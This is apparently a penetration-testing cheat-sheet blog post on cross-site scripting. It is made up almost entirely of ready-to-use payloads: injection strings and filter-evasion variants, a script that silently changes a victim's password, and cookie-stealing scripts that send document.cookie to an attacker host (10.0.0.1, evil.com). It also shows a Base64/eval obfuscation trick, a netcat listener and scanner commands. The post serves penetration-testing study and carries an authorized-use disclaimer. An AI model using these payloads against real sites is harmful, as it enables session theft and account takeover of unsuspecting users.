Home CROSS SITE SCRIPTING (XSS)
Post
Cancel

CROSS SITE SCRIPTING (XSS)

Posted May 5, 2023 Updated May 6, 2023
By BanZ
2 min read

XSS enables attackers to injection client-side scripts into web applications.

Payloads

We can insert them into URL params, POST params or HTTP headers.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

<script>alert(1)</script>
"><script>alert(1)</script>
<script>alert(1)</script>
"><script>alert(1)</script>
'></script><script>alert(1)</script>
';alert(1);'

" src=1 onerror=alert(1)>
<><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
"></span><img src=1 onerror=alert(1)>
"><svg onload=alert(1)>

javascript:alert(1)
\"-alert(1)//

%3Cscript%3Ealert%281%29%3C%2Fscript%3E

<a onmouseover=alert(1)>click</a>
" onmouseleave='alert(1)'">

<img src="jav ascript:alert(1)">
<img src="jav&#x09;ascript:alert(1)">
<img src="jav&#x0A;ascript:alert(1)">

</textarea><script>alert(1)</script>

<script>fetch('/profile?new_password=password');</script>

/?q=&subparam=--><script>alert(1)</script>
/index.php#value='><script>alert(1)</script>

JQuery

1
2

https://vulnerable.com/#<img src=1 onerror=alert(1)>
<iframe src="https://vulnerable.com/#" onload="this.src+='<img src=1 onerror=alert(1)>'">

AngularJS

If you find “<html ng-app>” or “<div ng-app>” in the HTML source code, you may be able to abuse it by XSS.

1

https://vulnerable.com/?search=

Cookie Stealing

Create the following payload for stealing Cookie and inject into target web page.

1
2
3
4
5
6
7
8
9
10
11

<!-- GET request -->
<script>fetch("http://10.0.0.1/?"+btoa(document.cookie));</script>

<!-- POST request -->
<script>
    fetch("http://10.0.0.1/", {
        method: 'POST',
        mode: 'no-cors',
        body: document.cookie
    });
</script>

Start web server or listener in local machine.

1
2
3

sudo python3 -m http.server 80
# or
sudo nc -lvp 80

Filter Evasion

Website may sanitize inputs to prevent from malicious code. However, we might be able to circumvent by modifying our code. For example, change JavaScript code to Base64 string.

1
2

fetch("http://evil.com/"+document.cookie);
# Base64: ZmV0Y2goImh0dHA6Ly9ldmlsLmNvbS8iICsgZG9jdW1lbnQuY29va2llKTs=

Insert the base64 string into the “eval” function as below.

1
2
3

# '(' => '\x28'
# ')' => '\x29'
<img src="x" onerror=eval.call`${"eval\x28atob`ZmV...2EoZCkpKQo=`\x29"}`

Automation

  • XSStrike is a XSS scanner : https://github.com/s0md3v/XSStrike
1
2
3
4
5
6

# GET request
python xsstrike.py -u http://vulnerable.com/?param=test
# POST reqeust
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"
# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json

Disclaimer

1
2

Exploit Notes are only for educational purpose or penetration testing, not attacking servers that you're not authorized. This site will not take any responsibility even if you attack the server illegally or cause damage unintentionally. Please use the contents in this site at your own risk.
The contents of this site are not original, but based on the information on the internet, the author actually tried and functioned. Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be new.
learning, web
ctf
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Trending Tags
ctf learning web
Trending Tags
ctf learning web